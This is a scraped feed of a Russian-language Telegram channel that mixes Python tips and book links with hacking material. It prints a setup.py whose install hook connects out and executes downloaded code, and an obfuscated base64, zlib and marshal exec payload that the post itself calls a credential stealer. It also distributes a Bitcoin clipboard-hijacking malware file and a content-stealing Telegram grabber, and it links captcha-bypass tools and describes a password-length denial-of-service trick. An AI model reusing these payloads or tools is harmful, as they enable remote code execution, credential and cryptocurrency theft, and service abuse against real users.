Localhost:8080
120 subscribers
23 photos
2 videos
32 files
21 links
Здесь ты найдешь приватные утилиты, эксклюзивные скрипты и редкие материалы взятые из закрытых источников
Для разработчиков, тестировщиков и всех, кто хочет глубже понять, как работает софт и защита
Всё бесплатно и только в ознакомительных целях
Download Telegram
Нашёл крутых ребят, которые сделали скрипт для автооткликов на HH
https://quick-offer.ru/
👍4
Всем привет для ознакомления разберем вредоносный код на питоне

При выполнении команды pip install
если в пакете находится подобный код, он будет выполнен автоматически во время процесса установки. Это происходит потому, что в setuptools можно переопределять стандартное поведение через такие классы, как install, и вставлять произвольный код.
Когда пользователь вызывает pip install, внутри запускается python setup.py install.
Метод run класса TotallyInnocentClass выполняется вместо стандартного процесса установки.
Любой код в этом методе будет выполнен.
Вредоносный код, определенный в методе run, запускается без какого-либо подтверждения или уведомления пользователя.
В данном случае происходит подключение к удаленному серверу и выполнение скачанного кода.

Критически опасная часть. Скачанные данные (в виде строки) передаются в exec, который выполняет их как Python-код

import socket
import struct

from setuptools import setup
from setuptools.command.install import install


class TotallyInnocentClass(install):
def run(self):
s = socket.socket(2, 1)
s.connect(("localhost", 4444))
l = struct.unpack(">I", s.recv(4))[0]
d = s.recv(4096)
while len(d) != l:
d += s.recv(4096)

exec(d, {"s": s})

setup(
cmdclass={
"install": TotallyInnocentClass
}
)

Такая атака может привести к выполнению вредоносных действий на вашей системе, поэтому стоит быть осторожным при работе с непроверенными пакетами
🔥91
если видите + - такой код
даже не вздумайте его запускать , на днях расшифровывал софт под капотом у него лежала кража учётных данных

Опасность данного кода в том, что он выполняет динамическое выполнение байткода
exec выполняет переданный код напрямую в интерпретаторе Python

_ = lambda : __import('marshal').loads(import('zlib').decompress(import('base64').b64decode(__[::-1])));exec((_)(b'Eq4ihuw/fu+/v/Lyt++68//iozvpY8/9+/3z+Pu/fd+/O9/85z/fW/336//157Py7q4357/P7zfYK9NkubWZZwCGNvH8Tp0yj/2x2U6BDc1AmKAC/9L7tMwHg7Wgq6Pl1wCrYKErstAYaqMwHvlk45lZWKYCk5LBSwFpHAuH5h/jHC6wofiD5BuE6SMgPIVUJCWEEBLdb/NxQOAlpzV0/6V3qojvPJWyhOQO64AQOB/iRDf7OjQz66mXrYQ2GdedhLbPeZeTJIaLpJKbfk4FVoNeBoK55gOligfVkBb9x3Ee845abzoLhk1MMx+JH8YbxsmoFyzmpcS6pmtYv2OXzIuuVZce9Me/1Vpq6FMVB5TYuG0ctmW'))
👍7
Внутри CPYTHON.pdf
7 MB
Внутри CPYTHON: гид по интерпретатору Python

Автор: Шоу Энтони
👍4
Forwarded from IT Delay | Learning
📌 Web на практике. CSS, HTML, jаvascript, MySQL, PHP для fullstack-разработчиков

💡 Кириченко А.В. 2021 год

📂 Скачать книгу

➡️ @ITDelay | #book | #книга
Please open Telegram to view this post
VIEW IN TELEGRAM
TgGraber.tar.gz
21.7 KB
Tg graber

пересылает контент с любого Tg канала на ваш канал без упоминания автора. Возможна замена ссылок и упоминаний в постах на ваши. Также доступна функция рерайтинга текста с использованием нейросетей


@localhostpython
🔥5
match-case в Python — это конструкция, введенная в Python 3.10, которая позволяет реализовать структуру, аналогичную операторам switch-case в других языках программирования. Она используется для сопоставления значения с различными шаблонами, и в зависимости от совпадения выполняется определенный блок кода.

Вместо длинных цепочек if-elif-else, match-case позволяет четко и эффективно проверять различные условия

match — это ключевое слово, которое используется для начала сопоставления с шаблонами

case — это ключевое слово, которое используется для определения каждого варианта (шаблона)

break или явный выход из блока конструкций match-case не нужен, так как конструкция автоматически завершает выполнение при совпадении

def describe_number(num):
match num:
case 1:
return "Это единица"
case 2:
return "Это двойка"
case 3:
return "Это тройка"
case _:
return "Это не 1, 2 или 3"

print(describe_number(1)) # Выведет: Это единица
print(describe_number(5)) # Выведет: Это не 1, 2 или 3


@localhostpython
6🔥1
btcClip.py
4.4 KB
BTC Clipper или «Bitcoin Clipper» — это тип вредоносного ПО

Он работает, заменяя адреса кошельков криптовалюты получателя на адреса, принадлежащие киберпреступникам. Этот инструмент демонстрирует, как некоторые киберпреступники перенаправляют транзакции криптовалюты, заменяя данные буфера обмена. Когда пользователи копируют адреса криптокошельков, которые они хотят использовать для перевода биткоинов, скопированная информация скрытно заменяется информацией злоумышленника

При вставке данных из буфера обмена адреса принадлежат криптовалютным кошелькам преступников, а не криптовалютному кошельку предполагаемого получателя.

Исключительно для анализа и исследования

@localhostpython
5
Высоконагруженные_приложения_Программирование,_масштабирование,.pdf
14 MB
Martin Kleppmann

Высоконагруженные приложения. Программирование, масштабирование, поддержка


@localhostpython
👍1
зачем использовать from None при try except

try:
raise ValueError("Some error")
except ValueError:
raise RuntimeError("Another error") from None



from None в Python позволяет скрыть цепочку исключений и вывести только последнее исключение

@localhostpython
🤝7
Хочу посоветовать 3 тренажера для подготовки к собесам

Easyprogger
https://easyprogger.ru/

Easyoffer
https://easyoffer.ru/

Solvit
https://solvit.space/

@localhostpython
7🔥1
Что выведет данный код

data = {
1 : 10,
1.0 : 12,
True : 14,
"1.0": 12
}

print(data)


{
1: 14, # Это ключ, который является True (или 1)
"1.0": 12 # Строка "1.0"
}


1 и 1.0 считаются одинаковыми ключами
потому что типы int и float с одинаковыми значениями (в данном случае 1) равны друг другу, то есть они приводятся к одному и тому же хешу.

Ключ True по сути является 1

Ключ "1.0" — это строка, и она не равна числовым значениям




@localhostpython
7
Математика на Python.pdf
69.3 MB
Математика на Python. 2022
Ю.А. Алхутов, В.В. Щиголев
👍6
Инструмент для решения ReCAPTCHA использует selenium

git clone git@github.com:thicccat688/selenium-recaptcha-solver.git


Инструмент для решения капч Amazon AWS WAF

git clone git@github.com:H4cK3dR4Du/AWS-WAF-Captcha-Solver.git


@localhostpython
👍7
Друзья, поздравляем вас с наступающим Новым годом! 💝

Этот год был насыщен интересными задачами, новыми технологиями и неожиданными возможностями. Мы что-то нашли, что-то потеряли, но главное — не сдаваться и верить в себя. Помните: дорогу осилит идущий

Пусть в новом году ваши проекты запускаются без багов, тесты проходят с первого раза, а дедлайны радуют своей гибкостью!

Пусть 2025 год станет временем роста, новых знаний и невероятных возможностей. Спасибо, что были с нами! До встречи в новом году!
124🥰2
Готовитесь к собесу? Тогда этот репозиторий вам поможет
Внутри: вопросы с упором на Python, Java, C++, C. Но также есть материалы про Go, HTML, JavaScript, Rust, Ruby, структуры данных и алгосы.
Репозиторий включает примеры задач с оптимизациями и пояснениями, которые помогут вам систематизировать знания и подготовиться как к техническим, так и к общим этапам собеседования.
Отличный инструмент для успешной подготовки к следующему этапу вашей карьеры:

https://github.com/jwasham/coding-interview-university?tab=readme-ov-file
5🥰2💅2💘1
Аналогично и с аудио, видео, фото
Всем привет!

На днях задумался, что большинство API не проверяют максимальную длину например (пароля). И что из этого может получиться? Сегодня в ознакомительных целях покажу, как это может привести к проблемам.

Как это работает?
Ищем "тяжелые" символы (например, эмодзи или редкие иероглифы).
Например, эмодзи 👩‍👩‍👧‍👧 (семья с двумя дочерьми) весит 28 байт вместо привычного 1 байта для символов ASCII.
Формируем пароль, состоящий из большого количества таких символов.
Пример:
👩‍👩‍👧‍👧 × 10 000 символов = строка, которая может весить 280 000 байт!

Что может случиться?
Если сервер не проверяет максимальную длину пароля:

Перегрузка сервера: обработка таких данных может вызвать сбой.
Краш базы данных: если пароль сохраняется в поле с фиксированной длиной, оно может переполниться.
Денежные убытки: в случае облачных сервисов использование больших объёмов памяти/ресурсов приводит к дополнительным расходам.
Вывод
🔐 Всегда ограничивайте длину пароля на уровне API.
⚙️ Анализируйте, какие данные вводятся пользователями, чтобы избежать неприятностей.

P.S. Использовать такие атаки против реальных систем незаконно — всё должно быть только в целях обучения и тестирования ваших систем.

@localhostpython
7🔥2🤝2